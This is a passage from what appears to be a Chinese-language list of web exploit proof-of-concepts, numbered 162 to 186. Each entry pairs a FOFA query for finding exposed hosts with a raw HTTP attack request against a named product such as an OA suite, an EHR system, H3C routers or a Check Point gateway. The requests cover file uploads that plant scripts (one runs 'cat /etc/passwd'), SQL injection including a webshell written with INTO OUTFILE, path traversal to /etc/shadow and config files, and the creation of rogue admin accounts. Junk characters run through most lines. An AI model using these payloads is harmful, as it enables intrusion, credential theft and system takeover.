</soap:Body>. k) t' v Z; T. F% [2 S. o
</soap:Envelope>8 K( \6 k* n$ A! y
: [; x$ p. N. D: T# d7 Y
7 B0 c# Z5 j7 T; a4 a' |- k
http://x.x.x.x/dizxdell.aspx
6 C0 U! [* p; ^! H3 ^* s3 w* O
j6 j8 l; J" O3 V% C162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
5 f" i9 W- ~3 Y! U1 ]! U4 iFOFA: app="和丰山海-数字标牌"* Y" S% x9 A2 n; U
POST /QH.aspx HTTP/1.1" V" V$ S6 p2 b% k1 v# H( }
Host: x.x.x.x
- U. \5 I* R) q2 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 z& D6 \8 v3 R+ V7 w3 p0 `
Connection: close
. q; B/ ]& ]/ [8 o+ I! lContent-Length: 583
; r) L* n+ o' S% g5 ~9 _6 |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey2 n% O0 _5 X% s' ]) v3 U4 S
Accept-Encoding: gzip/ W* q& C4 W- `5 S
! ?% N% |/ s: G% M& r) e
------WebKitFormBoundaryeegvclmyurlotuey
) Y$ X; i7 o5 Z) |Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
" I: B. u' F2 ~6 Q0 q" nContent-Type: application/octet-stream
7 z8 u7 }' n: N6 z
: a c+ `: E+ P% h8 Q# \<% response.write("ujidwqfuuqjalgkvrpqy") %>
* ?# e* w n1 Q' Y, X& S( s4 D0 S------WebKitFormBoundaryeegvclmyurlotuey
5 T ~' w& F, q) kContent-Disposition: form-data; name="action"
0 O4 E) `+ a# S; Y* F- w4 J* I7 D2 j, V+ b# R' v& ]+ @1 |5 L8 `
upload
/ V- o7 e6 Y7 }' E t. F4 X X& \------WebKitFormBoundaryeegvclmyurlotuey
8 Z7 ^0 _$ G- Q( M2 tContent-Disposition: form-data; name="responderId"% b* p( v5 @, \7 x' ?4 Z
% u: D( k" T* c' A% t9 kResourceNewResponder
' M+ s% |* V$ D* Q. y4 V------WebKitFormBoundaryeegvclmyurlotuey
8 r* M) ~; z7 C& J3 ZContent-Disposition: form-data; name="remotePath"
# k3 {. h& D, v" H, i. D
7 w' H$ M3 K+ u6 [; _" r z: p/opt/resources- o- w4 O" K0 M/ _
------WebKitFormBoundaryeegvclmyurlotuey--. j5 o X! } _0 c
. ~; I. ~3 M6 v! {+ O' X, I+ F" q$ w
- V; _9 Q5 v( E0 Ahttp://x.x.x.x/opt/resources/kjuhitjgk.aspx/ M: e% i% q2 ]. v% q7 G
0 E/ c* D2 G( N: _0 n* K
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; G7 ?2 x# R. B3 TFOFA: icon_hash="-795291075"0 y# I, K/ {/ U$ o2 }/ l& [
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.11 r2 r! B6 J0 s( \5 A0 r7 F+ T: i
Host: x.x.x.x$ N9 J- R0 ]8 U$ k% `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36" P" p, t H+ n0 I, k7 L3 z7 Y
Connection: close
. N7 O. D9 A# H6 f6 sContent-Length: 293
* O! ?: b. g7 |9 @! p L: NAccept: */*
: }1 T! J1 p _5 r# iAccept-Encoding: gzip, deflate
6 r G5 K0 i; H8 U) l, n+ J$ z0 KAccept-Language: zh-CN,zh;q=0.9
/ R' _& W! o3 S1 a9 U! y3 uContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod% D7 ^- L$ m) H9 |+ w
l+ C/ \ x c6 r' c1 J------iiqvnofupvhdyrcoqyuujyetjvqgocod
& @1 ]' ^8 G Z6 J: EContent-Disposition: form-data; name="name"
1 T/ d s. O, K- o V& \
2 J' |. ?" i' S9 S1.php
# R1 m( S6 P2 z6 k& ^% e8 ^' A------iiqvnofupvhdyrcoqyuujyetjvqgocod# t/ O, W3 S3 S+ [' D, u. F
Content-Disposition: form-data; name="upfile"; filename="1.php"2 ~ r% T/ ^ q) |
Content-Type: image/jpeg3 M( N( G5 P9 e
- k+ _' X/ M. }4 X2 ?5 U# N
rvjhvbhwwuooyiioxega, C& x) W8 Q. l
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
' c2 O5 L# Z, y. s$ d
( ~5 w4 |7 _( M5 G# R
- M/ Z- b4 V6 C L" r$ q4 [164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
5 l& X# B7 \5 F- m$ }# b$ BFOFA: title="智慧综合管理平台登入"% T" N: L" h/ C
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.16 Q+ K# D) P+ c. a V
Host: x.x.x.x4 y# p, L+ [- ~9 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0* ]! S- b- U' ~2 P8 T/ q, l' V) a
Content-Length: 2886 X5 R! Q: |9 \) M3 c: l% s
Accept: application/json, text/javascript, */*; q=0.010 Y/ s6 ~& k) Q% m) _/ O, W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,7 b; x$ H5 N! {8 R% e
Connection: close
8 s+ H* |4 }8 W$ t; l2 J5 A- NContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
8 ~( J, ?" O2 H5 u" ^' _, KX-Requested-With: XMLHttpRequest) h* t Q @# w
Accept-Encoding: gzip/ N/ [% f2 R5 D: o3 o
/ v' b" L9 E6 ~5 C( F3 R3 C
------dqdaieopnozbkapjacdbdthlvtlyl
# l2 u0 x" S+ y" X* }/ }, pContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
+ \- t G d; NContent-Type: image/jpeg
2 l. p& J) n3 \
: W- V) C0 E( y$ a( G3 }7 f<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
# B+ X% |& G5 |0 `------dqdaieopnozbkapjacdbdthlvtlyl--8 }# Y* M( ]5 |- V( y
I4 |7 ?8 \+ b) h- a! y4 _. f1 c" p+ o x- a
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx7 S \5 ]$ Y2 i5 A% A$ y- F# u5 a
& N$ H, @- ^; Y9 m/ |165. OrangeHRM 3.3.3 SQL 注入
/ k7 P: k; i N* P+ H- uCVE-2024-36428
% N3 K: Z9 b. t7 G8 m$ LFOFA: app="OrangeHRM-产品"
, i, D- x) B4 ^% E1 r% D4 lURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))1 P/ I2 j/ B& Y. A: p/ K# S
g9 p R* B1 @3 [
8 Y9 G" r# U6 |1 `
166. 中成科信票务管理平台SeatMapHandler SQL注入; n" a$ v# S2 t3 e
FOFA:body="技术支持:北京中成科信科技发展有限公司"
9 u3 A; q! K- z3 L' kPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.19 ?5 @$ e. H' @
Host:& }- T0 h) `% M; J
Pragma: no-cache
: x: E: v; W1 B8 k: \, A: ]/ W* ?9 ZCache-Control: no-cache8 Y4 F4 {9 K, J4 n' V0 Q
Upgrade-Insecure-Requests: 1
# W/ Q) y7 z3 i) Z9 t, s9 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
' S( {9 X6 W8 g- y: g" B2 Y2 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 o: s; ~* H, ~4 G
Accept-Encoding: gzip, deflate
: A# X) v$ e. B0 n: iAccept-Language: zh-CN,zh;q=0.9,en;q=0.81 }7 z# j& t; J6 K, }
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE; s' n8 D4 B# U
Connection: close
; F \2 r" Q9 PContent-Type: application/x-www-form-urlencoded0 s. z$ c" o, k+ C9 W7 V' v) Y l3 R
Content-Length: 89, r- p; K; o9 e. v
* h/ Z, W* r" N, s; H- AMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
! Q" b9 F" {* M+ O. D# K: ^5 n" E; N! ?/ }: ?# y
+ d, v+ B0 `$ d. A4 ^& b# j
167. 精益价值管理系统 DownLoad.aspx任意文件读取) S7 L2 S3 \6 P
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
' Q' M) W" I- ], Q9 r. nGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1. y5 r! L7 ~/ D% `- j9 a* {
Host:% N7 `! W4 y) Y( | G* o) C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 N" a4 x6 O+ E: C4 A; B- D
Content-Type: application/x-www-form-urlencoded! k3 A6 V t- _! |( d' y1 g# V6 Z
Accept-Encoding: gzip, deflate) U* y# H+ ]* s+ `, t/ ]
Accept: */*
3 [, o- h# Z, |0 @Connection: keep-alive2 ? Q9 \3 l) Y' y) u% _6 f
( T. z( w/ |; g! J: Q6 [8 ?- n( g% r( x5 i$ k
168. 宏景EHR OutputCode 任意文件读取3 [5 A) U7 ^9 l9 M% m! G
FOFA:app="HJSOFT-HCM"8 U) d# a3 q# P* q' o8 B
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.17 \0 m6 O. c8 I/ @
Host: your-ip$ u9 w! l( y; ?) Y5 v" M5 M/ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.364 I, @: u; f" [. t; e
Content-Type: application/x-www-form-urlencoded
& g% A; M; |: t$ EConnection: close
1 t) N3 d7 I, s- x1 O9 I. O! l0 L% N; X5 A
4 r6 B# m$ I$ l9 N
5 G [' \2 G5 W0 [( ?, N G169. 宏景EHR downlawbase SQL注入# J5 Z* @$ p$ T6 c6 V6 l' a
FOFA:app="HJSOFT-HCM") u# }) K+ ?3 H3 c+ W! C4 `/ N8 p$ J
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
$ T, k6 x2 ]+ x! `& J( W( UHost: your-ip
2 p4 e& I( Z0 n3 U9 r6 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; p" k" u( F% [6 G3 N5 E
Accept: */*
' Q" r8 U. J* i: Q- YAccept-Encoding: gzip, deflate
; F: L( V' V4 U; J; tConnection: close5 N+ ~( q7 ^: K% \
* |3 o& {# G& k' `+ G6 _7 `
! J; G/ z% Z/ t! }4 P8 H; A
) I/ p* H" H+ P E6 w
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
3 g7 C- y+ y7 ]2 T6 f7 ZFOFA:body="/general/sys/hjaxmanage.js"
& h5 p% S* x+ Y3 YPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1, P; |' X1 k4 R9 H9 }
Host: balalanengliang6 h' h, N9 C# b3 a; ~
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ a& O, X; J+ j
Content-Type: application/x-www-form-urlencoded6 X$ G. _# y4 z/ L$ g) R
D9 U& \7 v0 \, {# r0 d7 V. m
filename=../webapps/ROOT/WEB-INF/web.xml% {5 k/ e5 W1 l) L" t' ^
- |" A4 w. y3 [# b. K, K+ h; f+ c+ \
/ p( {5 f& @0 t6 B
171. 通天星CMSV6车载定位监控平台 SQL注入2 c- `+ T4 B* |0 D: h- x
FOFA:body="/808gps/"
9 o; t7 h, x1 D4 i1 yGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1( }6 _& H! G. ~, F$ q y, u% c
Host: your-ip
- m0 P$ i7 _& t$ @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.01 ]( Z5 Z9 {) Y' C6 l: A
Accept: */*1 b$ R2 I. }. e0 x1 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ a3 _# K+ K: N# t4 Y
Accept-Encoding: gzip, deflate
! e3 o: j/ U8 y2 P$ qConnection: close/ {: | ~' ]4 K. @
1 k* N- h6 X l# N$ O, A2 T/ B& E
, V2 s5 t' f6 N+ m1 P8 ^% F' y
% d d a+ _* ]9 U# _9 {
172. DT-高清车牌识别摄像机任意文件读取
- t& V8 n. j4 r( WFOFA:app="DT-高清车牌识别摄像机"
I2 {/ q8 I8 O9 b5 K7 i: }GET /../../../../etc/passwd HTTP/1.1# j2 |, B6 @: t s1 h' I% [
Host: your-ip; B, j8 ~9 \, n/ C& X j3 p0 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( m7 A0 i- w5 A. j
Accept-Encoding: gzip, deflate
) I8 w+ C3 b; t7 G4 L1 tAccept: */** f; ^: B/ \: Q: l
Connection: keep-alive L1 q' O( J! {
. Y- J( r3 l8 e
% Q- n1 @, j5 c( x; Y* g" ?# e; x( \$ c# }2 S! A4 S
173. Check Point 安全网关任意文件读取
- l; g# A/ {' c5 fCVE-2024-24919% F/ e# p) n7 B$ j v
FOFA:app="Check_Point-SSL-Network-Extender"0 ?- x+ g2 X* M1 E
POST /clients/MyCRL HTTP/1.17 X# x/ d$ w1 {! _7 h
Host: your-ip, I6 [5 B1 r5 l: t
Content-Type: application/x-www-form-urlencoded
% A" K: q" P2 g7 v# G) F6 u' D: g9 R7 U' _4 l! x! b D5 x
aCSHELL/../../../../../../../etc/shadow: Y# p; L- Z7 s5 N
# F; f; }) d q. ]
- o" D. d$ v2 ?$ K2 n9 Z: l, I6 }6 u! U/ D2 N* x5 Q7 ~5 u7 u
174. 金和OA C6 FileDownLoad.aspx 任意文件读取! D6 b# f* q2 |3 A' f; E( l
FOFA:app="金和网络-金和OA"# u* f# y4 C2 Z4 j
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1% `) z) j* U( @- _4 m
Host: your-ip
% e0 D1 O5 [! b* i {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; e" ]5 g7 \8 i2 v, X! \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: ?: h$ j3 Z' g% K7 K! r: v
Accept-Encoding: gzip, deflate, br' h, w# D- g$ F! L/ s U
Accept-Language: zh-CN,zh;q=0.9
2 j$ y, d) _# [Connection: close
4 ^$ P/ L |& ^ }
4 |$ E% q! W; g( \3 \' g" ]4 N+ ?! w4 L
2 i1 ^& g" h1 e/ Q$ c175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
2 |/ y( B2 X* | Z$ g/ b8 E$ Q. [FOFA:app="金和网络-金和OA"
% O( R/ j n. {1 t1 \1 O- NGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
0 K7 Q9 ^7 r; @Host:
' b7 v% @+ Y/ k- E5 h& oUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 \4 o, Z {9 d/ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 f$ n I+ R- {+ N( h$ T N# N% XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Q$ w5 H' p& G: |5 R0 c8 dAccept-Encoding: gzip, deflate5 w/ n( r0 \ s- ~. m' @! x
Connection: close' o. r9 Y" ?. w( c+ L9 ?
Upgrade-Insecure-Requests: 1
, B' ]8 i4 g+ ~. Z$ r
4 x: N$ ]5 \/ M& ~8 t: g9 R+ ]$ F$ G1 K& b! L
176. 电信网关配置管理系统 rewrite.php 文件上传
& G3 \7 O( @* y, GFOFA:body="img/login_bg3.png" && body="系统登录"! c: E8 J: t& Z1 d0 J4 w
POST /manager/teletext/material/rewrite.php HTTP/1.1
7 m# P$ _* @8 X/ C# r0 }Host: your-ip r( y) E& Y' y Z" R) z+ t; O# K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 ~2 r# r" M5 R8 L: D' i3 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT( A- T6 M) S* r3 G0 V' w* |
Connection: close
" w4 M3 q( y. J+ }5 N# S4 {0 G4 r" U" c3 v: E! I
------WebKitFormBoundaryOKldnDPT
9 m( ?2 b# `7 Z0 VContent-Disposition: form-data; name="tmp_name"; filename="test.php"2 d: }3 o; f: o/ |( z
Content-Type: image/png2 D! J) {' C2 w! \4 g" P( i
; D/ `; ^# B, B2 W% g
<?php system("cat /etc/passwd");unlink(__FILE__);?>
- S' k2 d7 T1 h& d$ N, k------WebKitFormBoundaryOKldnDPT6 {, r0 W6 B3 D6 C3 {
Content-Disposition: form-data; name="uploadtime"& m' ~+ ?$ a6 j
2 U8 u2 ~% n' T8 q$ c $ e8 k3 m. ^/ z" \+ R$ R
------WebKitFormBoundaryOKldnDPT--# {/ a/ j8 `9 J
6 R* V' ^- ~, R) }' Z# p8 U; h o
: R3 r# H J$ w7 O2 j" Z5 [
177. H3C路由器敏感信息泄露
* g. R( Y( q4 ?3 Z+ `! V) s/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& B# H6 f5 i. y: Z
/userLogin.asp/../actionpolicy_status/../M60.cfg: V/ g" r5 _& U1 K* R* C% g% R
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
' T* p# e) z8 y$ F% p- R* l/userLogin.asp/../actionpolicy_status/../GR5200.cfg. d! E* P& D, h3 @* B6 i
/userLogin.asp/../actionpolicy_status/../GR3200.cfg! J- b ?1 s$ _9 @3 i
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
5 O6 o* G; T" t/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg5 e" i$ d' l6 O- ?4 A3 h
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 D: w- A( {% L
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
; n/ @4 ]0 V {7 q! u8 Y! q/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
& f2 \0 F% A4 c4 I- b& {0 N( f/userLogin.asp/../actionpolicy_status/../ER5200.cfg
" Y T9 V6 g7 c/userLogin.asp/../actionpolicy_status/../ER5100.cfg8 h2 S0 z; e, O+ u: H, X
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg, B9 {" O! X' d0 F. c1 k
/userLogin.asp/../actionpolicy_status/../ER3260.cfg! b! B% I' K6 c( N# W
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg. {6 W: l3 `4 E, F) T, Y( @
/userLogin.asp/../actionpolicy_status/../ER3200.cfg2 X, X! n- v- \# O9 z9 O& B
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg( E, K0 J. K6 M/ X3 G1 S+ s+ g+ \
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
- C1 L! U. b( B" v% h/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg2 h Y* N4 K. p3 C
/userLogin.asp/../actionpolicy_status/../ER3100.cfg& Y+ B% f$ f& g, x0 ?$ r1 `
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg* w s9 a2 t6 [3 j1 O2 E
# y! n$ j7 l) w' k; L! f5 T5 x+ G' ]8 u" f7 B( d I1 D0 ?
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
1 f) u4 D0 R3 F1 a* t9 R& ZFOFA:header="/selfservice"
( W; {, z/ ?+ `; APOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
& R0 f9 S7 o' d f1 ^& S& k" {Host: P% {0 T+ I+ p% p) q7 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; L5 x" ]5 x# n) b8 a0 \# bContent-Length: 252% g' `* A! r7 [
Accept-Encoding: gzip, deflate
2 z% N. l( A6 n$ E* v( G: {Connection: close' z+ O* r. N1 D; G( M+ X+ ?3 J+ }/ o
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
9 z, C. @0 a3 M-----------------aqutkea7vvanpqy3rh2l
2 q: y" d( i5 W1 W0 mContent-Disposition: form-data; name="12234.txt"; filename="12234". K4 v% m: y2 ~! y W
Content-Type: application/octet-stream
5 N5 E7 z4 b1 P; k/ q3 NContent-Length: 255
0 _, f- D5 t/ {; v- ^8 b; ]
4 i9 i! @' s4 _/ Y' M- @% I122343 v, m/ J% k1 U5 D" P! m% w
-----------------aqutkea7vvanpqy3rh2l--
5 X. p6 S3 Z, R, P. u4 t/ [! y/ W3 R! a+ o7 P* q% v
) N! @( M' @: u( f9 U8 R
GET /imc/primepush/%2e%2e/flex/12234.txt# o1 }1 ?: Y1 B# }5 [1 D
4 j: U. u% J) r9 a) D
2 F* k8 J, y' ^; a179. 建文工程管理系统存在任意文件读取
, `( d/ y7 X4 v/ w- mPOST /Common/DownLoad2.aspx HTTP/1.1
0 S( @8 `3 ]5 P+ m/ l3 jHost: {{Hostname}}4 _- ?8 s, |/ o* n
Content-Type: application/x-www-form-urlencoded0 u1 Y! x/ ~. ]. M4 K
User-Agent: Mozilla/5.0
]: F: U+ q( M( E7 v" t6 Y" Q: w2 W" I) p6 ]+ B# u
path=../log4net.config&Name=
2 r7 o2 V: y2 K% j4 i/ H+ a) c! B: O" A7 x% H! [$ f* N; E
( M# ~4 g/ v, U0 D8 |5 D180. 帮管客 CRM jiliyu SQL注入" W4 r2 |7 w# M6 M) R
FOFA:app="帮管客-CRM"! j/ ~+ B5 i1 U4 Q# V& e, t
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1/ G ~; d* K8 T7 K& v/ w
Host: your-ip
8 V% b6 B6 Z1 E/ _0 \: p6 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; }- Y: E7 r3 E& w+ H- C, @4 L; }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" V5 k7 D( ]8 d( T c! `7 vAccept-Encoding: gzip, deflate$ l* Z- X- ^; {: }; H* [4 O u7 S0 u
Accept-Language: zh-CN,zh;q=0.9' |. r2 G6 V1 V" I
Connection: close: s5 `+ ^0 [3 z+ v
2 X7 I, z! [2 c" ^5 s
$ o& X3 @+ i# x181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: B/ E1 `' h$ vFOFA:"PDCA/js/_publicCom.js"7 `6 i" i. H5 X
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1: v+ c; N$ e' z
Host: your-ip
0 p6 n7 A# N" k. ~( Z: ]- f. z* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36& x: ?' Q% }9 Q1 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- l, G0 v! A9 U6 F* K& P1 J- d
Accept-Encoding: gzip, deflate, br
3 c0 }1 x" b- OAccept-Language: zh-CN,zh;q=0.9% A. z0 H0 H4 c( v6 F) Y
Connection: close5 _, A# K: P) @9 K, ]
Content-Type: application/x-www-form-urlencoded
4 n0 V4 x; o/ E& r) A
G& B& a1 b- C* C! H, \6 l- H j5 W' t( y, E, ^' L1 S
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=207 X/ E* F8 u- j' z! I
' V3 l; i2 k6 Y7 {& Y" _
8 _0 O5 i2 I0 o$ t7 m6 ]
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建+ w/ L& _$ \# d/ V( E
FOFA:"PDCA/js/_publicCom.js"
; e* }0 I& S0 }. |POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1% l T( x) v3 E2 A
Host: your-ip
2 g w; V, X" V6 a& I! v5 }3 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 J6 K9 F, N7 a2 \' B' s$ p' X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 r: w' Y& ~' cAccept-Encoding: gzip, deflate, br, j1 H3 @2 S$ p! \* t
Accept-Language: zh-CN,zh;q=0.9. g5 r! \5 N( a5 A, g& D
Connection: close+ h/ e) ]& U% \. w8 h. @: A
Content-Type: application/x-www-form-urlencoded5 |7 z: e! `; ] ?' R
, S3 G: m: I+ B) y( n2 I+ k' v
+ Y0 P" B0 K6 ?username=test1234&pwd=test1234&savedays=1" W5 C. {% O' ]0 ]) [" [
; e, J1 Z$ T4 S9 r9 r! j' h& x5 |8 f, @! |8 N4 s- M/ X3 W" e5 b
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入! Z: u3 [# N: |
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面") Q/ t# D' e; U/ J9 f* C2 h
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1& X$ v, {$ ]9 s. J8 c* ?
Host: your-ip
1 r0 I% ?5 d' }User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ _; N+ A5 o$ _7 V' O. t/ GAccept-Charset: utf-8
& l* ^0 F/ L! l8 U1 AAccept-Encoding: gzip, deflate
/ {) o7 A$ m' U$ ] aConnection: close
- N* n) @% ?9 U3 H- @
; }1 R( h! r2 p
9 F, [4 f! @# O184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
4 m) M4 d! v0 j( nFOFA:server="SunFull-Webs"# ~# Y# j; Z, L2 U: g
POST /soap/AddUser HTTP/1.1% C0 P1 j; G7 f4 o
Host: your-ip
6 W, {) f4 @* W6 ^: ]Accept-Encoding: gzip, deflate0 `1 F6 x& n0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, N' Z: a$ i* X" d+ ?( V0 i1 {Accept: application/xml, text/xml, */*; q=0.01
" s, u4 }% g8 C5 ` h$ kContent-Type: text/xml; charset=utf-8
! R& g+ u; X: r3 u. AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 E) D- R: h6 {& h: z0 D6 Z
X-Requested-With: XMLHttpRequest7 n% @+ P. V1 P: R9 d. Z
0 E8 M5 |. M1 J0 F# O5 J' M. v1 o8 M& Y( F
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
: ~8 U" y2 C$ T) A3 o$ z }: ^
3 G' J8 s5 ?7 Y
& ?. E8 A. B2 Y; _- ~185. 瑞友天翼应用虚拟化系统SQL注入* P" e0 v5 W1 Q8 {' ]; X& `
version < 7.0.5.1
4 [3 A3 z* } L; ]% i- pFOFA:app="REALOR-天翼应用虚拟化系统"
7 V4 h6 i+ I+ w) G, wGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
% D' b' [# X- h& pHost: host- q! o. h2 l: I0 D7 d8 P
$ P0 `* w! E1 J0 Z+ Z7 v
- a" S7 l2 r- p. e) `$ m" j e H) `186. F-logic DataCube3 SQL注入2 H' g" j* E6 y' Z% D3 ?
CVE-2024-31750
